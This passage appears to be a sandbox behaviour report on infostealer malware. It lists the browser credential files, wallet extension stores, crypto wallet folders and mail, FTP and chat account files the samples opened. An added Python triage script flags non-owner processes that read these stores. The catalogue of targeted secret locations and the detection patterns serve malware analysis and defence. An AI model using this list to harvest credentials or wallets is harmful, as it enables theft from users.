                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbch
                                Source: C:\ProgramData\MPGPH131\MPGPH131.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad\CURRENT
                                Source: C:\ProgramData\MPGPH131\MPGPH131.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln\CURRENT
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbg
                                Source: C:\Windows\System32\rundll32.exe; File opened: C:\Users\user\AppData\Local\Chromium\User Data\Default\Login Data
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahd
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhk
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeap
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfe
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai
                                Source: C:\Windows\System32\rundll32.exe; File opened: C:\Users\user\AppData\Local\Comodo\Dragon\User Data\Default\Login Data
                                Source: C:\ProgramData\MPGPH131\MPGPH131.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj\CURRENT
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbm
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaoc
                                Source: C:\ProgramData\MPGPH131\MPGPH131.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac\CURRENT
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoa
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqlite
                                Source: C:\ProgramData\MPGPH131\MPGPH131.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi\CURRENT
                                Source: C:\ProgramData\MPGPH131\MPGPH131.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne\CURRENT
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgk
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkd
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\key4.db
                                Source: C:\ProgramData\MPGPH131\MPGPH131.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\IndexedDB\chrome-extension_blnieiiffboillknjnepogjhkgnoapac_0.indexeddb.leveldb\CURRENT
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default
                                Source: C:\ProgramData\MPGPH131\MPGPH131.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn\CURRENT
                                Source: C:\ProgramData\MPGPH131\MPGPH131.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk\CURRENT
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolaf
                                Source: C:\ProgramData\MPGPH131\MPGPH131.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
                                Source: C:\ProgramData\MPGPH131\MPGPH131.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\kpfopkelmapcoipemfendmdcghnegimn\CURRENT
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao
                                Source: C:\Windows\System32\rundll32.exeFile opened: C:\Users\user\AppData\Roaming\FileZilla\sitemanager.xml
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Ledger Live
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Binance
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB
Source: C:\Windows\System32\rundll32.exe | File opened: C:\Users\user\AppData\Roaming\.purple\accounts.xml
Source: C:\Windows\System32\rundll32.exe | File opened: C:\.purple\accounts.xml
Source: C:\Windows\System32\rundll32.exe | File opened: C:\Windows\System32\.purple\accounts.xml
Source: C:\Windows\System32\rundll32.exe | File opened: C:\Windows\.purple\accounts.xml
Source: C:\Windows\System32\rundll32.exe | File opened: C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\.purple\accounts.xml
Source: C:\Windows\System32\rundll32.exe | File opened: C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\.purple\accounts.xml
Source: C:\Windows\System32\rundll32.exe | File opened: C:\Program Files\WindowsApps\Microsoft.WindowsStore_11910.1002.5.0_x64__8wekyb3d8bbwe\.purple\accounts.xml
Source: C:\Windows\System32\rundll32.exe | File opened: C:\Windows\ImmersiveControlPanel\.purple\accounts.xml
Source: C:\Windows\System32\rundll32.exe | File opened: C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\.purple\accounts.xml
Source: C:\Windows\System32\rundll32.exe | File opened: C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\.purple\accounts.xml
Source: C:\Windows\System32\rundll32.exe | File opened: C:\Windows\SysWOW64\.purple\accounts.xml
Source: C:\Windows\System32\rundll32.exe | File opened: C:\Program Files (x86)\pYYcSxIhBKAwfJeYUhxRdRWdJVtxceeCaTqdxlePlmkrwxyhCI\.purple\accounts.xml
Source: C:\Windows\System32\rundll32.exe | File opened: C:\Users\user\AppData\Local\Temp\5454e6f062\.purple\accounts.xml
Source: C:\Windows\System32\rundll32.exe | File opened: C:\Program Files\Google\Chrome\Application\.purple\accounts.xml
Source: C:\Windows\System32\rundll32.exe | File opened: C:\Users\user\AppData\Local\Temp\1000008001\.purple\accounts.xml
Source: C:\Windows\System32\rundll32.exe | File opened: C:\Users\user\AppData\Local\RageMP131\.purple\accounts.xml
Source: C:\Windows\System32\rundll32.exe | File opened: C:\Users\user\AppData\Local\Temp\4d0ab15804\.purple\accounts.xml
Source: C:\Windows\System32\rundll32.exe | File opened: C:\Users\user\AppData\Local\Temp\1000147001\.purple\accounts.xml
Source: C:\Windows\System32\rundll32.exe | File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\.purple\accounts.xml
Note on the .purple\accounts.xml entries: only the first path (under AppData\Roaming) is where Pidgin keeps its account file. The System32, SysWOW64, SystemApps, WindowsApps, Temp and .NET Framework locations are not Pidgin data directories; the pattern is consistent with the relative name .purple\accounts.xml being resolved through the process's search path after the real profile lookup failed, and should not be read as Pidgin being installed in those directories.
Source: C:\Users\user\AppData\Local\Temp\1000009001\2531414c80.exe | File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
Source: C:\Users\user\AppData\Local\Temp\1000009001\2531414c80.exe | File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
Source: C:\Users\user\AppData\Local\Temp\1000009001\2531414c80.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
Source: C:\ProgramData\MPGPH131\MPGPH131.exe | File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
Source: C:\ProgramData\MPGPH131\MPGPH131.exe | File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
Source: C:\ProgramData\MPGPH131\MPGPH131.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
Source: C:\ProgramData\MPGPH131\MPGPH131.exe | File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
Source: C:\ProgramData\MPGPH131\MPGPH131.exe | File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
Source: C:\ProgramData\MPGPH131\MPGPH131.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
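The file and registry accesses listed above are the stealer components' credential and wallet collection. What makes such a log useful to a defender is the pairing of an unexpected reader (RegAsm.exe, rundll32.exe, a binary under ProgramData or Temp) with a data store it has no business opening. The script below is an added example and is not part of the Joe Sandbox report: it parses lines in this report's "Source: <process> File opened: <path>" / "Key opened: <key>" shape (with or without the " | " separator), maps each path to the credential store it belongs to, and flags any access by a process outside an owner allowlist. The owner allowlist, the category names and the benign chrome.exe control line are assumptions of the example; the other sample lines are copied from the report above.

```python
"""Triage helper: flag credential-store and wallet access by processes that
are not the store's owning application.  Added example; not part of the
Joe Sandbox report.  Input lines follow the report's
"Source: <process> File opened: <path>" / "Key opened: <key>" shape,
with or without a " | " separator between the two fields."""
import re
from collections import defaultdict
from pathlib import PureWindowsPath

LINE_RE = re.compile(
    r"^Source:\s*(?P<proc>.+?\.exe)\s*\|?\s*(?:File|Key) opened:\s*(?P<path>.+?)\s*$",
    re.IGNORECASE,
)

# (category, pattern over the opened path or key, processes expected to read it).
# The owner allowlist is an assumption of this example, not data from the report.
STORES = [
    ("browser-credentials",
     r"\\(Google\\Chrome|Chromium|Comodo\\Dragon)\\User Data\\",
     {"chrome.exe", "chromium.exe", "dragon.exe"}),
    ("browser-credentials",
     r"\\Mozilla\\Firefox\\Profiles\\[^\\]+\\(key4\.db|logins\.json|places\.sqlite|cookies\.sqlite)$",
     {"firefox.exe"}),
    ("mail-client", r"\\Thunderbird\\profiles\.ini$", {"thunderbird.exe"}),
    ("mail-client", r"\\Windows Messaging Subsystem\\Profiles\\", {"outlook.exe"}),
    ("ftp-client", r"\\FileZilla\\sitemanager\.xml$", {"filezilla.exe"}),
    ("im-client", r"\\\.purple\\accounts\.xml$", {"pidgin.exe"}),
    ("crypto-wallet",
     r"\\(Electrum\\wallets|Exodus\\exodus\.wallet|Ledger Live|atomic\\Local Storage"
     r"|Coinomi\\Coinomi\\wallets|Bitcoin\\wallets|Binance|com\.liberty\.jaxx)",
     {"exodus.exe", "coinomi.exe", "bitcoin-qt.exe"}),  # assumed wallet owners
]
COMPILED = [(cat, re.compile(pat, re.IGNORECASE), owners) for cat, pat, owners in STORES]


def parse(line):
    """Return (process image path, opened path) or None for non-matching lines."""
    m = LINE_RE.match(line.strip())
    return (m["proc"], m["path"]) if m else None


def classify(path):
    """Return (category, owner allowlist) for a known store, else None."""
    for cat, rx, owners in COMPILED:
        if rx.search(path):
            return cat, owners
    return None


def scan(lines):
    """Return (findings, categories-per-process).  A finding is
    (image name, category, path) for every access by a non-owner process."""
    findings, per_proc = [], defaultdict(set)
    for line in lines:
        parsed = parse(line)
        if parsed is None:
            continue
        proc, path = parsed
        hit = classify(path)
        if hit is None:
            continue
        cat, owners = hit
        image = PureWindowsPath(proc).name.lower()
        if image in owners:
            continue  # the owning application reading its own data
        findings.append((image, cat, path))
        per_proc[image].add(cat)
    return findings, dict(per_proc)


def stealer_candidates(per_proc, min_categories=2):
    """Processes that touched at least `min_categories` distinct store types;
    one browser read can be a backup tool, several categories rarely are."""
    return sorted(p for p, cats in per_proc.items() if len(cats) >= min_categories)


# Constructed sample: ten lines taken from the report above (one kept in the
# un-separated "rundll32.exeFile opened:" form) plus one assumed benign control
# line in which Chrome reads its own Login Data.
SAMPLE_LOG = r"""
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\key4.db
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
Source: C:\Windows\System32\rundll32.exe | File opened: C:\Users\user\AppData\Local\Chromium\User Data\Default\Login Data
Source: C:\Windows\System32\rundll32.exeFile opened: C:\Users\user\AppData\Local\Comodo\Dragon\User Data\Default\Login Data
Source: C:\Windows\System32\rundll32.exe | File opened: C:\Users\user\AppData\Roaming\FileZilla\sitemanager.xml
Source: C:\Windows\System32\rundll32.exe | File opened: C:\Users\user\AppData\Roaming\.purple\accounts.xml
Source: C:\ProgramData\MPGPH131\MPGPH131.exe | File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
Source: C:\ProgramData\MPGPH131\MPGPH131.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj\CURRENT
Source: C:\ProgramData\MPGPH131\MPGPH131.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
"""

if __name__ == "__main__":
    found, per_proc = scan(SAMPLE_LOG.splitlines())
    for image, cat, path in found:
        print(f"{image:14} {cat:20} {path}")
    print("stealer candidates:", stealer_candidates(per_proc))
```

On the report's own lines every access is a finding, and all three readers (regasm.exe, rundll32.exe, mpgph131.exe) touch two or more store categories, which is the signal worth alerting on; the control line for chrome.exe is dropped by the owner check. The allowlist is deliberately a denylist-free design: anything not known to own the data is reported, so new LOLBins or renamed droppers need no rule change.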
Source: b3168c3d9b.exe | Binary or memory string: WIN_81
Source: b3168c3d9b.exe, 00000004.00000003.2394975883.0000000001189000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: WIN_XP
Source: b3168c3d9b.exe, 0000000F.00000002.2493343445.0000000000192000.00000002.00000001.01000000.00000009.sdmp | Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_11WIN_10WIN_2022WIN_2019WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\AppearanceUSERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte64HKEY_LOCAL_MACHINEHKLMHKEY_CLASSES_ROOTHKCRHKEY_CURRENT_CONFIGHKCCHKEY_CURRENT_USERHKCUHKEY_USERSHKUREG_EXPAND_SZREG_SZREG_MULTI_SZREG_DWORDREG_QWORDREG_BINARYRegDeleteKeyExWadvapi32.dll+.-.\\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs](*UCP)\XISVISIBLEISENABLEDTABLEFTTABRIGHTCURRENTTABSHOWDROPDOWNHIDEDROPDOWNADDSTRINGDELSTRINGFINDSTRINGGETCOUNTSETCURRENTSELECTIONGETCURRENTSELECTIONSELECTSTRINGISCHECKEDCHECKUNCHECKGETSELECTEDGETLINECOUNTGETCURRENTLINEGETCURRENTCOLEDITPASTEGETLINESENDCOMMANDIDGETITEMCOUNTGETSUBITEMCOUNTGETTEXTGETSELECTEDCOUNTISSELECTEDSELECTALLSELECTCLEARSELECTINVERTDESELECTFINDITEMVIEWCHANGEGETTOTALCOUNTCOLLAPSEEXPANDmsctls_statusbar321tooltips_class32%d/%02d/%02dbuttonComboboxListboxSysDateTimePick32SysMonthCal32.icl.exe.dllMsctls_Progress32msctls_trackbar32SysAnimate32msctls_updown32SysTabControl32SysTreeView32SysListView32-----@GUI_DRAGID@GUI_DROPID@GUI_DRAGFILEError text not found (please report)Q\EDEFINEUTF16)UTF)UCP)NO_AUTO_POSSESS)NO_START_OPT)LIMIT_MATCH=LIMIT_RECURSION=CR)LF)CRLF)ANY)ANYCRLF)BSR_ANYCRLF)BSR_UNICODE)argument is not a compiled regular expressionargument not compiled in 16 bit modeinternal error: opcode not recognizedinternal error: missing capturing bracketfailed to get memory
Source: b3168c3d9b.exe | Binary or memory string: WIN_XPe
Source: b3168c3d9b.exe, 0000000F.00000003.2486053330.0000000001728000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: WIN_XPq
Source: b3168c3d9b.exe | Binary or memory string: WIN_VISTA
Source: b3168c3d9b.exe | Binary or memory string: WIN_7
Source: b3168c3d9b.exe | Binary or memory string: WIN_8
Note on these strings: the WIN_11 ... WIN_XPe version constants, the @GUI_DRAGID/@GUI_DROPID/@GUI_DRAGFILE macros, the GUI control command names (ISVISIBLE, TABLEFT, ADDSTRING, ...) and the PCRE option and error strings are AutoIt3 runtime strings. They show that b3168c3d9b.exe embeds the AutoIt interpreter; they are not logic written by the malware author, and the OS-version matches above are the interpreter's version table rather than evidence of OS fingerprinting by the script itself.
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Directory queried: C:\Users\user\Documents
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Directory queried: C:\Users\user\Documents
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Directory queried: C:\Users\user\Documents\AQRFEVRTGL
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Directory queried: C:\Users\user\Documents\BJZFPPWAPT
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Directory queried: C:\Users\user\Documents\BNAGMGSPLO
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Directory queried: C:\Users\user\Documents\GIGIYTFFYT
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Directory queried: C:\Users\user\Documents\NVWZAPQSQL
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Directory queried: C:\Users\user\Documents\NWCXBPIUYI
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Directory queried: C:\Users\user\Documents\PALRGUCVEH
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Directory queried: C:\Users\user\Documents\SNIPGPPREP
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Directory queried: C:\Users\user\Documents\SQSJKEBWDT
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Directory queried: C:\Users\user\Documents\TQDFJHPUIU
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Directory queried: C:\Users\user\Documents\UNKRLCVOHV
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Directory queried: C:\Users\user\Documents\AQRFEVRTGL
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Directory queried: C:\Users\user\Documents\BJZFPPWAPT
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Directory queried: C:\Users\user\Documents\EEGWXUHVUG
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Directory queried: C:\Users\user\Documents\GIGIYTFFYT
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Directory queried: C:\Users\user\Documents\NVWZAPQSQL
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Directory queried: C:\Users\user\Documents\NWCXBPIUYI
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Directory queried: C:\Users\user\Documents\PALRGUCVEH
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Directory queried: C:\Users\user\Documents\SQSJKEBWDT
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Directory queried: C:\Users\user\Documents\TQDFJHPUIU
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Directory queried: C:\Users\user\Documents
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Directory queried: C:\Users\user\Documents\NVWZAPQSQL
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Directory queried: C:\Users\user\Documents\NWCXBPIUYI
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Directory queried: C:\Users\user\Documents\PALRGUCVEH
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Directory queried: C:\Users\user\Documents\SNIPGPPREP
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Directory queried: C:\Users\user\Documents\UNKRLCVOHV
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Directory queried: C:\Users\user\Documents
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Directory queried: C:\Users\user\Documents\GIGIYTFFYT
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Directory queried: C:\Users\user\Documents\SNIPGPPREP
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Directory queried: C:\Users\user\Documents\GIGIYTFFYT
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Directory queried: C:\Users\user\Documents\NVWZAPQSQL
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Directory queried: C:\Users\user\Documents\UNKRLCVOHV
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Directory queried: C:\Users\user\Documents\TQDFJHPUIU
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Directory queried: C:\Users\user\Documents
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Directory queried: C:\Users\user\Documents\BNAGMGSPLO
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Directory queried: C:\Users\user\Documents\EEGWXUHVUG
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Directory queried: C:\Users\user\Documents\GIGIYTFFYT
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Directory queried: C:\Users\user\Documents\NVWZAPQSQL
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Directory queried: C:\Users\user\Documents\NWCXBPIUYI
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Directory queried: C:\Users\user\Documents\PALRGUCVEH
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Directory queried: C:\Users\user\Documents\TQDFJHPUIU
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Directory queried: C:\Users\user\Documents\UNKRLCVOHV
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Directory queried: C:\Users\user\Documents
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Directory queried: C:\Users\user\Documents\EEGWXUHVUG
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Directory queried: C:\Users\user\Documents\UNKRLCVOHV
Source: Yara match | File source: 00000008.00000002.2511321549.0000000001538000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000014.00000002.2529795385.0000000000B01000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: 2531414c80.exe PID: 7556, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: MPGPH131.exe PID: 6188, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: MPGPH131.exe PID: 2584, type: MEMORYSTR

                                Remote Access Functionality

Source: Yara match | File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\alexxxxxxxx[1].exe, type: DROPPED
Source: Yara match | File source: C:\Users\user\AppData\Local\Temp\1000148001\alexxxxxxxx.exe, type: DROPPED
Source: Yara match | File source: C:\Users\user\AppData\Local\Temp\iolo\dm\BIT1659.tmp, type: DROPPED
Source: Yara match | File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\jok[1].exe, type: DROPPED
Source: Yara match | File source: C:\Users\user\AppData\Local\Temp\1000152001\jok.exe, type: DROPPED
Source: Yara match | File source: 00000008.00000002.2516925001.0000000007BDD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000014.00000003.2363329164.0000000007A11000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000008.00000002.2511321549.000000000149E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000014.00000002.2539684694.0000000007A11000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000014.00000003.2362400081.0000000007A11000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
